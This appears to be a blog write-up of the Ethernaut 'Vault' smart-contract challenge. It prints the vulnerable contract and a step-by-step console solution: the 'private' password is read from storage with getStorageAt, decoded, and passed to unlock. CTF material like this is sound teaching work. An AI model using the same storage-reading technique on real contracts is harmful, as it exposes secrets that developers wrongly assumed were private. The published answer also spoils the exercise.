Wei's

Ethernaut - 8. Vault

28 Aug 2022 ethernaut  solidity 

Difficulty: πŸŒ•πŸŒ•πŸŒ‘πŸŒ‘πŸŒ‘

Unlock the vault to pass the level!

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}

Writeup

How can we get private variable password ? Well, There is an important method everyone should know : web3.eth.getStorageAt(...), checkout web3.js document to get details.

State variables marked as private and local variables are still publicly accessible.

  1. Get new Instance.
  2. Call the method 
    
 await contract.locked()
 // true
  3. Call the method 
    
 await web3.eth.getStorageAt('0x7B794D77e945A806b2c6Ca41cb4bB6977F37D340', 1);
 // '0x412076657279207374726f6e67207365637265742070617373776f7264203a29'
  4. Call web3 method 
    
 web3.utils.toAscii('0x412076657279207374726f6e67207365637265742070617373776f7264203a29')
 // 'A very strong secret password :)'
  5. Call the method 
    
 await contract.unlock('0x412076657279207374726f6e67207365637265742070617373776f7264203a29')
  6. Call the method 
    
 await contract.locked()
 // false
  7. Submit instance ΞΎ( βœΏοΌžβ—‘β›)

Related posts

Archive

solidity picoCTF Go ethernaut linux leetcode blockchain sql react leetcode-top-interview array medium typescript smart-contract solana javascript java ethereum easy css Linux zsh ubuntu two-pointer next.js jekyll http hardhat golang ethers Secureum Rust web wallet vscode typeorm truffle stack shell rpc notion notes nodejs nextjs mocha html github git geth express eslint docker cloudflare Vim DSA